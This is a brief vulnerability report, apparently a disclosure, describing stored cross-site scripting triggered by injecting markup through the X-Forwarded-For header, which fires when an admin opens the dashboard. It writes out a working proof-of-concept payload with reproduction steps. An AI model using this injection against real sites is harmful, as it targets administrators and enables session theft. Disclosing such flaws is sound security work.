Using X-Forwarded-For Header Visitor can manipulate ip to trigger xss
1.Visit any url and Add Header X-Forward-For: 127.0.0.1"><image/src/onerror=prompt(8)>
2.If admin check in dashboard xss will trigger
Check This image
>https://drive.google.com/file/d/1hNSEr5Fjnzd9n62SFspW3z7Ojs-q6cCw/view?usp=share_link
>https://drive.google.com/file/d/1cfnIoKWtLsjRUcU4J0Qs_bU-a_Z6gPNo/view?usp=share_link
Disclaimer: This is my own website